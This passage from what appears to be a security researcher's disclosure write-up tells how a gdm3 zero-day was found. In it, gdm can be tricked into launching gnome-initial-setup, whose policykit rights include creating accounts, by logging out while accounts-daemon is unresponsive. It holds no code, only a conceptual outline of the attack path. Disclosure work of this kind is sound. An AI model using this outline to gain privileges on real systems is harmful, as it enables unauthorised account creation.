Unfortunately, when I tried to reproduce the same sequence of steps, I couldn’t get it to work again. I checked the system logs for clues, but there wasn’t much information because I didn’t have gdm’s debug messages enabled. The exploit that I have since developed requires the user to log out of their account, but I definitely didn’t do that on the evening of October 14. So it remains a mystery how I accidentally triggered the bug that evening.

Later that evening, I sent further messages to my (US-based) colleagues describing what had happened. Talking about the dialog boxes helped to jog my memory about something that I had noticed recently. Many of the system services that I have been looking at use policykit to check whether the client is authorized to request an action. I had noticed a file called gnome-initial-setup.pkla, which is a policykit configuration file that grants a user named gnome-initial-setup the ability to do a number of security-sensitive things, such as mounting filesystems and creating new user accounts. So I said to my colleagues: “I wonder if it has something to do with gnome-initial-setup,” and Bas Alberts almost immediately jumped in with a hypothesis that turned out to be right on the money: “You tricked gdm into launching gnome-initial-setup, I reckon, which maybe happens if a gdm session can’t verify that an account already exists.”

After that, it was just a matter of finding the code in gdm3 that triggers gnome-initial-setup and figuring out how to trigger it while accounts-daemon is unresponsive. I found that the relevant code is triggered when a user logs out.

And that’s the story of how the end of my workday was the start of an 0-day!